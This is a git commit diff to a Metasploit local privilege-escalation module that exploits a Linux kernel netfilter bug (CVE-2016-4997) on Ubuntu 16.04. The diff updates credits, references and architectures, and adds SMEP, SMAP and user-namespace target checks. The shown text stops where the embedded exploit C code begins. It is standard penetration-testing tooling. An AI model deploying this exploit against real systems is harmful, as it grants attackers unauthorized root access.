Land rapid7#12727, netfilter_priv_esc_ipv4 improvements

h00die · h00die · commit 1ff925eac92c · 2019-12-15T07:07:40.000-05:00
diff --git a/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb b/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
 
   include Msf::Post::File
+  include Msf::Post::Linux::Kernel
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -15,40 +16,49 @@ def initialize(info = {})
         'Name'           => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',
         'Description'    => %q{
           This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently
-          only works against Ubuntu 16.04 (not 16.04.1) with kernel
-          4.4.0-21-generic.
+          only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.
+
           Several conditions have to be met for successful exploitation:
           Ubuntu:
           1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)
           2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile
-          Kernel 4.4.0-31-generic and newer are not vulnerable.
+          Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.
 
           We write the ascii files and compile on target instead of locally since metasm bombs for not
           having cdefs.h (even if locally installed)
         },
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            'h00die <mike@stcyrsecurity.com>',  # Module
-            'vnik'                         # Discovery
+            'h00die <mike@stcyrsecurity.com>', # Module
+            'vnik',        # Exploit
+            'Jesse Hertz', # Discovery
+            'Tim Newsham'  # Discovery
           ],
         'DisclosureDate' => 'Jun 03 2016',
         'Platform'       => [ 'linux'],
-        'Arch'           => [ ARCH_X86 ],
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes'   => [ 'shell', 'meterpreter' ],
         'Targets'        =>
           [
             [ 'Ubuntu', { } ]
             #[ 'Fedora', { } ]
           ],
-        'DefaultTarget'  => 0,
         'References'     =>
           [
-            [ 'EDB', '40049'],
-            [ 'CVE', '2016-4997'],
-            [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']
-          ]
-      ))
+            ['EDB', '40049'],
+            ['CVE', '2016-4997'],
+            ['CVE', '2016-4998'],
+            ['URL', 'https://www.openwall.com/lists/oss-security/2016/06/24/5'],
+            ['URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'],
+            ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91']
+          ],
+        'Notes'          =>
+          {
+            'Reliability' => [ UNRELIABLE_SESSION ],
+            'Stability'   => [ CRASH_OS_DOWN ],
+          },
+        'DefaultTarget'  => 0))
     register_options [
       OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),
       OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),
@@ -59,22 +69,26 @@ def initialize(info = {})
     ]
   end
 
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
   def check
     def iptables_loaded?()
       # user@ubuntu:~$ grep ip_tables /proc/modules
       # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000
       # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000
       vprint_status('Checking if ip_tables is loaded in kernel')
       if target.name == "Ubuntu"
-        iptables = read_file('/proc/modules')
+        iptables = read_file('/proc/modules').to_s
         if iptables.include?('ip_tables')
           vprint_good('ip_tables.ko is loaded')
         else
           print_error('ip_tables.ko is not loaded.  root needs to run iptables -L or similar command')
         end
         return iptables.include?('ip_tables')
       elsif target.name == "Fedora"
-        iptables = read_file('/proc/modules')
+        iptables = read_file('/proc/modules').to_s
         if iptables.include?('iptable_raw')
           vprint_good('iptable_raw is loaded')
         else
@@ -86,28 +100,38 @@ def iptables_loaded?()
       end
     end
 
-    def shemsham_installed?()
-      # we want this to be false.
-      vprint_status('Checking if shem or sham are installed')
-      shemsham = read_file('/proc/cpuinfo')
-      if shemsham.include?('shem')
-        print_error('shem installed, system not vulnerable.')
-      elsif shemsham.include?('sham')
-        print_error('sham installed, system not vulnerable.')
-      else
-        vprint_good('shem and sham not present.')
-      end
-      return (shemsham.include?('shem') or shemsham.include?('sham'))
+    return CheckCode::Safe unless iptables_loaded?
+
+    if smep_enabled?
+      print_error('SMEP enabled, system not vulnerable.')
+      return CheckCode::Safe
     end
+    vprint_good('SMEP is not enabled')
 
-    if iptables_loaded?() and not shemsham_installed?()
-      return CheckCode::Appears
-    else
+    if smap_enabled?
+      print_error('SMAP enabled, system not vulnerable.')
+      return CheckCode::Safe
+    end
+    vprint_good('SMAP is not enabled')
+
+    unless userns_enabled?
+      vprint_error('Unprivileged user namespaces are not permitted')
       return CheckCode::Safe
     end
+    vprint_good('Unprivileged user namespaces are permitted')
+
+    CheckCode::Appears
   end
 
   def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
     # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
     def has_prereqs?()
       vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')
@@ -160,17 +184,14 @@ def has_prereqs?()
         vprint_status('Dropping pre-compiled exploit on system')
       end
     end
-    if check != CheckCode::Appears
-      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
-    end
 
     desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
     env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
     pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
     payload_file = rand_text_alpha(8)
     payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
 
-    # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
+    # direct copy of code from exploit-db, except removed the check for smep/smap and ip_tables.ko since we can do that in the check area here
     # removed         #include <netinet/in.h> per busterb comment in PR 7326
     decr = %q{
       #define _GNU_SOURCE
